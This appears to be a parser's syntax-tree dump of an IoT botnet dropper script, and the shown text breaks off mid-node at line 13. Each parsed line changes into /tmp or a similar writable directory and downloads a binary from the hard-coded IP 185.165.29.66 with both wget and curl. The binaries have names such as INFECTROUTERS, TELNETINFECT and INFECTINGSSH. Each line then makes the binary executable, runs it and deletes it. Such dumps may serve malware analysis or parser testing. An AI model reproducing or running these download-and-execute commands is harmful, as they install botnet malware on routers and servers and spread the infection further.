ListNode(lineno=2, pos=(12, 213), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 106), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 106), word='http://185.165.29.66/INFECTROUTERS'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(106, 107)),
  CommandNode(lineno=2, pos=(108, 150), parts=[
    WordNode(lineno=2, pos=(108, 112), word='curl'),
    WordNode(lineno=2, pos=(113, 115), word='-O'),
    WordNode(lineno=2, pos=(116, 150), word='http://185.165.29.66/INFECTROUTERS'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(150, 151)),
  CommandNode(lineno=2, pos=(152, 174), parts=[
    WordNode(lineno=2, pos=(152, 157), word='chmod'),
    WordNode(lineno=2, pos=(158, 160), word='+x'),
    WordNode(lineno=2, pos=(161, 174), word='INFECTROUTERS'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(174, 175)),
  CommandNode(lineno=2, pos=(176, 191), parts=[
    WordNode(lineno=2, pos=(176, 191), word='./INFECTROUTERS'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(191, 192)),
  CommandNode(lineno=2, pos=(193, 213), parts=[
    WordNode(lineno=2, pos=(193, 195), word='rm'),
    WordNode(lineno=2, pos=(196, 199), word='-rf'),
    WordNode(lineno=2, pos=(200, 213), word='INFECTROUTERS'),
  ]),
])
ListNode(lineno=3, pos=(214, 410), parts=[
  CommandNode(lineno=3, pos=(214, 221), parts=[
    WordNode(lineno=3, pos=(214, 216), word='cd'),
    WordNode(lineno=3, pos=(217, 221), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(222, 224)),
  CommandNode(lineno=3, pos=(225, 236), parts=[
    WordNode(lineno=3, pos=(225, 227), word='cd'),
    WordNode(lineno=3, pos=(228, 236), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(237, 239)),
  CommandNode(lineno=3, pos=(240, 247), parts=[
    WordNode(lineno=3, pos=(240, 242), word='cd'),
    WordNode(lineno=3, pos=(243, 247), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(248, 250)),
  CommandNode(lineno=3, pos=(251, 259), parts=[
    WordNode(lineno=3, pos=(251, 253), word='cd'),
    WordNode(lineno=3, pos=(254, 259), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(260, 262)),
  CommandNode(lineno=3, pos=(263, 267), parts=[
    WordNode(lineno=3, pos=(263, 265), word='cd'),
    WordNode(lineno=3, pos=(266, 267), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(267, 268)),
  CommandNode(lineno=3, pos=(269, 307), parts=[
    WordNode(lineno=3, pos=(269, 273), word='wget'),
    WordNode(lineno=3, pos=(274, 307), word='http://185.165.29.66/TELNETINFECT'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(307, 308)),
  CommandNode(lineno=3, pos=(309, 350), parts=[
    WordNode(lineno=3, pos=(309, 313), word='curl'),
    WordNode(lineno=3, pos=(314, 316), word='-O'),
    WordNode(lineno=3, pos=(317, 350), word='http://185.165.29.66/TELNETINFECT'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(350, 351)),
  CommandNode(lineno=3, pos=(352, 373), parts=[
    WordNode(lineno=3, pos=(352, 357), word='chmod'),
    WordNode(lineno=3, pos=(358, 360), word='+x'),
    WordNode(lineno=3, pos=(361, 373), word='TELNETINFECT'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(373, 374)),
  CommandNode(lineno=3, pos=(375, 389), parts=[
    WordNode(lineno=3, pos=(375, 389), word='./TELNETINFECT'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(389, 390)),
  CommandNode(lineno=3, pos=(391, 410), parts=[
    WordNode(lineno=3, pos=(391, 393), word='rm'),
    WordNode(lineno=3, pos=(394, 397), word='-rf'),
    WordNode(lineno=3, pos=(398, 410), word='TELNETINFECT'),
  ]),
])
ListNode(lineno=4, pos=(411, 607), parts=[
  CommandNode(lineno=4, pos=(411, 418), parts=[
    WordNode(lineno=4, pos=(411, 413), word='cd'),
    WordNode(lineno=4, pos=(414, 418), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(419, 421)),
  CommandNode(lineno=4, pos=(422, 433), parts=[
    WordNode(lineno=4, pos=(422, 424), word='cd'),
    WordNode(lineno=4, pos=(425, 433), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(434, 436)),
  CommandNode(lineno=4, pos=(437, 444), parts=[
    WordNode(lineno=4, pos=(437, 439), word='cd'),
    WordNode(lineno=4, pos=(440, 444), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(445, 447)),
  CommandNode(lineno=4, pos=(448, 456), parts=[
    WordNode(lineno=4, pos=(448, 450), word='cd'),
    WordNode(lineno=4, pos=(451, 456), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(457, 459)),
  CommandNode(lineno=4, pos=(460, 464), parts=[
    WordNode(lineno=4, pos=(460, 462), word='cd'),
    WordNode(lineno=4, pos=(463, 464), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(464, 465)),
  CommandNode(lineno=4, pos=(466, 504), parts=[
    WordNode(lineno=4, pos=(466, 470), word='wget'),
    WordNode(lineno=4, pos=(471, 504), word='http://185.165.29.66/INFECTINGSSH'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(504, 505)),
  CommandNode(lineno=4, pos=(506, 547), parts=[
    WordNode(lineno=4, pos=(506, 510), word='curl'),
    WordNode(lineno=4, pos=(511, 513), word='-O'),
    WordNode(lineno=4, pos=(514, 547), word='http://185.165.29.66/INFECTINGSSH'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(547, 548)),
  CommandNode(lineno=4, pos=(549, 570), parts=[
    WordNode(lineno=4, pos=(549, 554), word='chmod'),
    WordNode(lineno=4, pos=(555, 557), word='+x'),
    WordNode(lineno=4, pos=(558, 570), word='INFECTINGSSH'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(570, 571)),
  CommandNode(lineno=4, pos=(572, 586), parts=[
    WordNode(lineno=4, pos=(572, 586), word='./INFECTINGSSH'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(586, 587)),
  CommandNode(lineno=4, pos=(588, 607), parts=[
    WordNode(lineno=4, pos=(588, 590), word='rm'),
    WordNode(lineno=4, pos=(591, 594), word='-rf'),
    WordNode(lineno=4, pos=(595, 607), word='INFECTINGSSH'),
  ]),
])
ListNode(lineno=5, pos=(608, 809), parts=[
  CommandNode(lineno=5, pos=(608, 615), parts=[
    WordNode(lineno=5, pos=(608, 610), word='cd'),
    WordNode(lineno=5, pos=(611, 615), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(616, 618)),
  CommandNode(lineno=5, pos=(619, 630), parts=[
    WordNode(lineno=5, pos=(619, 621), word='cd'),
    WordNode(lineno=5, pos=(622, 630), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(631, 633)),
  CommandNode(lineno=5, pos=(634, 641), parts=[
    WordNode(lineno=5, pos=(634, 636), word='cd'),
    WordNode(lineno=5, pos=(637, 641), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(642, 644)),
  CommandNode(lineno=5, pos=(645, 653), parts=[
    WordNode(lineno=5, pos=(645, 647), word='cd'),
    WordNode(lineno=5, pos=(648, 653), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(654, 656)),
  CommandNode(lineno=5, pos=(657, 661), parts=[
    WordNode(lineno=5, pos=(657, 659), word='cd'),
    WordNode(lineno=5, pos=(660, 661), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(661, 662)),
  CommandNode(lineno=5, pos=(663, 702), parts=[
    WordNode(lineno=5, pos=(663, 667), word='wget'),
    WordNode(lineno=5, pos=(668, 702), word='http://185.165.29.66/bashINFECTION'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(702, 703)),
  CommandNode(lineno=5, pos=(704, 746), parts=[
    WordNode(lineno=5, pos=(704, 708), word='curl'),
    WordNode(lineno=5, pos=(709, 711), word='-O'),
    WordNode(lineno=5, pos=(712, 746), word='http://185.165.29.66/bashINFECTION'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(746, 747)),
  CommandNode(lineno=5, pos=(748, 770), parts=[
    WordNode(lineno=5, pos=(748, 753), word='chmod'),
    WordNode(lineno=5, pos=(754, 756), word='+x'),
    WordNode(lineno=5, pos=(757, 770), word='bashINFECTION'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(770, 771)),
  CommandNode(lineno=5, pos=(772, 787), parts=[
    WordNode(lineno=5, pos=(772, 787), word='./bashINFECTION'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(787, 788)),
  CommandNode(lineno=5, pos=(789, 809), parts=[
    WordNode(lineno=5, pos=(789, 791), word='rm'),
    WordNode(lineno=5, pos=(792, 795), word='-rf'),
    WordNode(lineno=5, pos=(796, 809), word='bashINFECTION'),
  ]),
])
ListNode(lineno=6, pos=(810, 981), parts=[
  CommandNode(lineno=6, pos=(810, 817), parts=[
    WordNode(lineno=6, pos=(810, 812), word='cd'),
    WordNode(lineno=6, pos=(813, 817), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(818, 820)),
  CommandNode(lineno=6, pos=(821, 832), parts=[
    WordNode(lineno=6, pos=(821, 823), word='cd'),
    WordNode(lineno=6, pos=(824, 832), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(833, 835)),
  CommandNode(lineno=6, pos=(836, 843), parts=[
    WordNode(lineno=6, pos=(836, 838), word='cd'),
    WordNode(lineno=6, pos=(839, 843), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(844, 846)),
  CommandNode(lineno=6, pos=(847, 855), parts=[
    WordNode(lineno=6, pos=(847, 849), word='cd'),
    WordNode(lineno=6, pos=(850, 855), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(856, 858)),
  CommandNode(lineno=6, pos=(859, 863), parts=[
    WordNode(lineno=6, pos=(859, 861), word='cd'),
    WordNode(lineno=6, pos=(862, 863), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(863, 864)),
  CommandNode(lineno=6, pos=(865, 898), parts=[
    WordNode(lineno=6, pos=(865, 869), word='wget'),
    WordNode(lineno=6, pos=(870, 898), word='http://185.165.29.66/tftpION'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(898, 899)),
  CommandNode(lineno=6, pos=(900, 936), parts=[
    WordNode(lineno=6, pos=(900, 904), word='curl'),
    WordNode(lineno=6, pos=(905, 907), word='-O'),
    WordNode(lineno=6, pos=(908, 936), word='http://185.165.29.66/tftpION'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(936, 937)),
  CommandNode(lineno=6, pos=(938, 954), parts=[
    WordNode(lineno=6, pos=(938, 943), word='chmod'),
    WordNode(lineno=6, pos=(944, 946), word='+x'),
    WordNode(lineno=6, pos=(947, 954), word='tftpION'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(954, 955)),
  CommandNode(lineno=6, pos=(956, 965), parts=[
    WordNode(lineno=6, pos=(956, 965), word='./tftpION'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(965, 966)),
  CommandNode(lineno=6, pos=(967, 981), parts=[
    WordNode(lineno=6, pos=(967, 969), word='rm'),
    WordNode(lineno=6, pos=(970, 973), word='-rf'),
    WordNode(lineno=6, pos=(974, 981), word='tftpION'),
  ]),
])
ListNode(lineno=7, pos=(982, 1153), parts=[
  CommandNode(lineno=7, pos=(982, 989), parts=[
    WordNode(lineno=7, pos=(982, 984), word='cd'),
    WordNode(lineno=7, pos=(985, 989), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(990, 992)),
  CommandNode(lineno=7, pos=(993, 1004), parts=[
    WordNode(lineno=7, pos=(993, 995), word='cd'),
    WordNode(lineno=7, pos=(996, 1004), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1005, 1007)),
  CommandNode(lineno=7, pos=(1008, 1015), parts=[
    WordNode(lineno=7, pos=(1008, 1010), word='cd'),
    WordNode(lineno=7, pos=(1011, 1015), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1016, 1018)),
  CommandNode(lineno=7, pos=(1019, 1027), parts=[
    WordNode(lineno=7, pos=(1019, 1021), word='cd'),
    WordNode(lineno=7, pos=(1022, 1027), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1028, 1030)),
  CommandNode(lineno=7, pos=(1031, 1035), parts=[
    WordNode(lineno=7, pos=(1031, 1033), word='cd'),
    WordNode(lineno=7, pos=(1034, 1035), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1035, 1036)),
  CommandNode(lineno=7, pos=(1037, 1070), parts=[
    WordNode(lineno=7, pos=(1037, 1041), word='wget'),
    WordNode(lineno=7, pos=(1042, 1070), word='http://185.165.29.66/wgeting'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1070, 1071)),
  CommandNode(lineno=7, pos=(1072, 1108), parts=[
    WordNode(lineno=7, pos=(1072, 1076), word='curl'),
    WordNode(lineno=7, pos=(1077, 1079), word='-O'),
    WordNode(lineno=7, pos=(1080, 1108), word='http://185.165.29.66/wgeting'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1108, 1109)),
  CommandNode(lineno=7, pos=(1110, 1126), parts=[
    WordNode(lineno=7, pos=(1110, 1115), word='chmod'),
    WordNode(lineno=7, pos=(1116, 1118), word='+x'),
    WordNode(lineno=7, pos=(1119, 1126), word='wgeting'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1126, 1127)),
  CommandNode(lineno=7, pos=(1128, 1137), parts=[
    WordNode(lineno=7, pos=(1128, 1137), word='./wgeting'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1137, 1138)),
  CommandNode(lineno=7, pos=(1139, 1153), parts=[
    WordNode(lineno=7, pos=(1139, 1141), word='rm'),
    WordNode(lineno=7, pos=(1142, 1145), word='-rf'),
    WordNode(lineno=7, pos=(1146, 1153), word='wgeting'),
  ]),
])
ListNode(lineno=8, pos=(1154, 1335), parts=[
  CommandNode(lineno=8, pos=(1154, 1161), parts=[
    WordNode(lineno=8, pos=(1154, 1156), word='cd'),
    WordNode(lineno=8, pos=(1157, 1161), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1162, 1164)),
  CommandNode(lineno=8, pos=(1165, 1176), parts=[
    WordNode(lineno=8, pos=(1165, 1167), word='cd'),
    WordNode(lineno=8, pos=(1168, 1176), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1177, 1179)),
  CommandNode(lineno=8, pos=(1180, 1187), parts=[
    WordNode(lineno=8, pos=(1180, 1182), word='cd'),
    WordNode(lineno=8, pos=(1183, 1187), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1188, 1190)),
  CommandNode(lineno=8, pos=(1191, 1199), parts=[
    WordNode(lineno=8, pos=(1191, 1193), word='cd'),
    WordNode(lineno=8, pos=(1194, 1199), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1200, 1202)),
  CommandNode(lineno=8, pos=(1203, 1207), parts=[
    WordNode(lineno=8, pos=(1203, 1205), word='cd'),
    WordNode(lineno=8, pos=(1206, 1207), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1207, 1208)),
  CommandNode(lineno=8, pos=(1209, 1244), parts=[
    WordNode(lineno=8, pos=(1209, 1213), word='wget'),
    WordNode(lineno=8, pos=(1214, 1244), word='http://185.165.29.66/crononums'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1244, 1245)),
  CommandNode(lineno=8, pos=(1246, 1284), parts=[
    WordNode(lineno=8, pos=(1246, 1250), word='curl'),
    WordNode(lineno=8, pos=(1251, 1253), word='-O'),
    WordNode(lineno=8, pos=(1254, 1284), word='http://185.165.29.66/crononums'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1284, 1285)),
  CommandNode(lineno=8, pos=(1286, 1304), parts=[
    WordNode(lineno=8, pos=(1286, 1291), word='chmod'),
    WordNode(lineno=8, pos=(1292, 1294), word='+x'),
    WordNode(lineno=8, pos=(1295, 1304), word='crononums'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1304, 1305)),
  CommandNode(lineno=8, pos=(1306, 1317), parts=[
    WordNode(lineno=8, pos=(1306, 1317), word='./crononums'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1317, 1318)),
  CommandNode(lineno=8, pos=(1319, 1335), parts=[
    WordNode(lineno=8, pos=(1319, 1321), word='rm'),
    WordNode(lineno=8, pos=(1322, 1325), word='-rf'),
    WordNode(lineno=8, pos=(1326, 1335), word='crononums'),
  ]),
])
ListNode(lineno=9, pos=(1336, 1502), parts=[
  CommandNode(lineno=9, pos=(1336, 1343), parts=[
    WordNode(lineno=9, pos=(1336, 1338), word='cd'),
    WordNode(lineno=9, pos=(1339, 1343), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1344, 1346)),
  CommandNode(lineno=9, pos=(1347, 1358), parts=[
    WordNode(lineno=9, pos=(1347, 1349), word='cd'),
    WordNode(lineno=9, pos=(1350, 1358), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1359, 1361)),
  CommandNode(lineno=9, pos=(1362, 1369), parts=[
    WordNode(lineno=9, pos=(1362, 1364), word='cd'),
    WordNode(lineno=9, pos=(1365, 1369), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1370, 1372)),
  CommandNode(lineno=9, pos=(1373, 1381), parts=[
    WordNode(lineno=9, pos=(1373, 1375), word='cd'),
    WordNode(lineno=9, pos=(1376, 1381), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1382, 1384)),
  CommandNode(lineno=9, pos=(1385, 1389), parts=[
    WordNode(lineno=9, pos=(1385, 1387), word='cd'),
    WordNode(lineno=9, pos=(1388, 1389), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1389, 1390)),
  CommandNode(lineno=9, pos=(1391, 1423), parts=[
    WordNode(lineno=9, pos=(1391, 1395), word='wget'),
    WordNode(lineno=9, pos=(1396, 1423), word='http://185.165.29.66/ftping'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1423, 1424)),
  CommandNode(lineno=9, pos=(1425, 1460), parts=[
    WordNode(lineno=9, pos=(1425, 1429), word='curl'),
    WordNode(lineno=9, pos=(1430, 1432), word='-O'),
    WordNode(lineno=9, pos=(1433, 1460), word='http://185.165.29.66/ftping'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1460, 1461)),
  CommandNode(lineno=9, pos=(1462, 1477), parts=[
    WordNode(lineno=9, pos=(1462, 1467), word='chmod'),
    WordNode(lineno=9, pos=(1468, 1470), word='+x'),
    WordNode(lineno=9, pos=(1471, 1477), word='ftping'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1477, 1478)),
  CommandNode(lineno=9, pos=(1479, 1487), parts=[
    WordNode(lineno=9, pos=(1479, 1487), word='./ftping'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1487, 1488)),
  CommandNode(lineno=9, pos=(1489, 1502), parts=[
    WordNode(lineno=9, pos=(1489, 1491), word='rm'),
    WordNode(lineno=9, pos=(1492, 1495), word='-rf'),
    WordNode(lineno=9, pos=(1496, 1502), word='ftping'),
  ]),
])
ListNode(lineno=10, pos=(1503, 1674), parts=[
  CommandNode(lineno=10, pos=(1503, 1510), parts=[
    WordNode(lineno=10, pos=(1503, 1505), word='cd'),
    WordNode(lineno=10, pos=(1506, 1510), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1511, 1513)),
  CommandNode(lineno=10, pos=(1514, 1525), parts=[
    WordNode(lineno=10, pos=(1514, 1516), word='cd'),
    WordNode(lineno=10, pos=(1517, 1525), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1526, 1528)),
  CommandNode(lineno=10, pos=(1529, 1536), parts=[
    WordNode(lineno=10, pos=(1529, 1531), word='cd'),
    WordNode(lineno=10, pos=(1532, 1536), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1537, 1539)),
  CommandNode(lineno=10, pos=(1540, 1548), parts=[
    WordNode(lineno=10, pos=(1540, 1542), word='cd'),
    WordNode(lineno=10, pos=(1543, 1548), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1549, 1551)),
  CommandNode(lineno=10, pos=(1552, 1556), parts=[
    WordNode(lineno=10, pos=(1552, 1554), word='cd'),
    WordNode(lineno=10, pos=(1555, 1556), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1556, 1557)),
  CommandNode(lineno=10, pos=(1558, 1591), parts=[
    WordNode(lineno=10, pos=(1558, 1562), word='wget'),
    WordNode(lineno=10, pos=(1563, 1591), word='http://185.165.29.66/pftping'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1591, 1592)),
  CommandNode(lineno=10, pos=(1593, 1629), parts=[
    WordNode(lineno=10, pos=(1593, 1597), word='curl'),
    WordNode(lineno=10, pos=(1598, 1600), word='-O'),
    WordNode(lineno=10, pos=(1601, 1629), word='http://185.165.29.66/pftping'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1629, 1630)),
  CommandNode(lineno=10, pos=(1631, 1647), parts=[
    WordNode(lineno=10, pos=(1631, 1636), word='chmod'),
    WordNode(lineno=10, pos=(1637, 1639), word='+x'),
    WordNode(lineno=10, pos=(1640, 1647), word='pftping'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1647, 1648)),
  CommandNode(lineno=10, pos=(1649, 1658), parts=[
    WordNode(lineno=10, pos=(1649, 1658), word='./pftping'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1658, 1659)),
  CommandNode(lineno=10, pos=(1660, 1674), parts=[
    WordNode(lineno=10, pos=(1660, 1662), word='rm'),
    WordNode(lineno=10, pos=(1663, 1666), word='-rf'),
    WordNode(lineno=10, pos=(1667, 1674), word='pftping'),
  ]),
])
ListNode(lineno=11, pos=(1675, 1836), parts=[
  CommandNode(lineno=11, pos=(1675, 1682), parts=[
    WordNode(lineno=11, pos=(1675, 1677), word='cd'),
    WordNode(lineno=11, pos=(1678, 1682), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1683, 1685)),
  CommandNode(lineno=11, pos=(1686, 1697), parts=[
    WordNode(lineno=11, pos=(1686, 1688), word='cd'),
    WordNode(lineno=11, pos=(1689, 1697), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1698, 1700)),
  CommandNode(lineno=11, pos=(1701, 1708), parts=[
    WordNode(lineno=11, pos=(1701, 1703), word='cd'),
    WordNode(lineno=11, pos=(1704, 1708), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1709, 1711)),
  CommandNode(lineno=11, pos=(1712, 1720), parts=[
    WordNode(lineno=11, pos=(1712, 1714), word='cd'),
    WordNode(lineno=11, pos=(1715, 1720), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1721, 1723)),
  CommandNode(lineno=11, pos=(1724, 1728), parts=[
    WordNode(lineno=11, pos=(1724, 1726), word='cd'),
    WordNode(lineno=11, pos=(1727, 1728), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1728, 1729)),
  CommandNode(lineno=11, pos=(1730, 1761), parts=[
    WordNode(lineno=11, pos=(1730, 1734), word='wget'),
    WordNode(lineno=11, pos=(1735, 1761), word='http://185.165.29.66/shing'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1761, 1762)),
  CommandNode(lineno=11, pos=(1763, 1797), parts=[
    WordNode(lineno=11, pos=(1763, 1767), word='curl'),
    WordNode(lineno=11, pos=(1768, 1770), word='-O'),
    WordNode(lineno=11, pos=(1771, 1797), word='http://185.165.29.66/shing'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1797, 1798)),
  CommandNode(lineno=11, pos=(1799, 1813), parts=[
    WordNode(lineno=11, pos=(1799, 1804), word='chmod'),
    WordNode(lineno=11, pos=(1805, 1807), word='+x'),
    WordNode(lineno=11, pos=(1808, 1813), word='shing'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1813, 1814)),
  CommandNode(lineno=11, pos=(1815, 1822), parts=[
    WordNode(lineno=11, pos=(1815, 1822), word='./shing'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1822, 1823)),
  CommandNode(lineno=11, pos=(1824, 1836), parts=[
    WordNode(lineno=11, pos=(1824, 1826), word='rm'),
    WordNode(lineno=11, pos=(1827, 1830), word='-rf'),
    WordNode(lineno=11, pos=(1831, 1836), word='shing'),
  ]),
])
ListNode(lineno=12, pos=(1837, 1988), parts=[
  CommandNode(lineno=12, pos=(1837, 1844), parts=[
    WordNode(lineno=12, pos=(1837, 1839), word='cd'),
    WordNode(lineno=12, pos=(1840, 1844), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1845, 1847)),
  CommandNode(lineno=12, pos=(1848, 1859), parts=[
    WordNode(lineno=12, pos=(1848, 1850), word='cd'),
    WordNode(lineno=12, pos=(1851, 1859), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1860, 1862)),
  CommandNode(lineno=12, pos=(1863, 1870), parts=[
    WordNode(lineno=12, pos=(1863, 1865), word='cd'),
    WordNode(lineno=12, pos=(1866, 1870), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1871, 1873)),
  CommandNode(lineno=12, pos=(1874, 1882), parts=[
    WordNode(lineno=12, pos=(1874, 1876), word='cd'),
    WordNode(lineno=12, pos=(1877, 1882), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1883, 1885)),
  CommandNode(lineno=12, pos=(1886, 1890), parts=[
    WordNode(lineno=12, pos=(1886, 1888), word='cd'),
    WordNode(lineno=12, pos=(1889, 1890), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1890, 1891)),
  CommandNode(lineno=12, pos=(1892, 1921), parts=[
    WordNode(lineno=12, pos=(1892, 1896), word='wget'),
    WordNode(lineno=12, pos=(1897, 1921), word='http://185.165.29.66/nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1921, 1922)),
  CommandNode(lineno=12, pos=(1923, 1955), parts=[
    WordNode(lineno=12, pos=(1923, 1927), word='curl'),
    WordNode(lineno=12, pos=(1928, 1930), word='-O'),
    WordNode(lineno=12, pos=(1931, 1955), word='http://185.165.29.66/nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1955, 1956)),
  CommandNode(lineno=12, pos=(1957, 1969), parts=[
    WordNode(lineno=12, pos=(1957, 1962), word='chmod'),
    WordNode(lineno=12, pos=(1963, 1965), word='+x'),
    WordNode(lineno=12, pos=(1966, 1969), word='nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1969, 1970)),
  CommandNode(lineno=12, pos=(1971, 1976), parts=[
    WordNode(lineno=12, pos=(1971, 1976), word='./nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1976, 1977)),
  CommandNode(lineno=12, pos=(1978, 1988), parts=[
    WordNode(lineno=12, pos=(1978, 1980), word='rm'),
    WordNode(lineno=12, pos=(1981, 1984), word='-rf'),
    WordNode(lineno=12, pos=(1985, 1988), word='nut'),
  ]),
])
ListNode(lineno=13, pos=(1989, 2160), parts=[
  CommandNode(lineno=13, pos=(1989, 1996), parts=[
    WordNode(lineno=13, pos=(1989, 1991), word='cd'),
    WordNode(lineno=13, pos=(1992, 1996), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1997, 1999)),
  CommandNode(lineno=13, pos=(2000, 2011), parts=[
    WordNode(lineno=13, pos=(2000, 2002), word='cd'),
    WordNode(lineno=13, pos=(2003, 2011), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(2012, 2014)),
  CommandNode(lineno=13, pos=(2015, 2022), parts=[
    WordNode(lineno=13, pos=(2015, 2017), word='cd'),
    WordNode(lineno=13, pos=(2018, 2022), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(2023, 2025)),
  CommandNode(lineno=13, pos=(2026, 2034), parts=[
    WordNode(lineno=13, pos=(2026, 2028), word='cd'),
    WordNode(lineno=13, pos=(2029, 2034), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(2035, 2037)),
  CommandNode(lineno=13, pos=(2038, 2042), parts=[
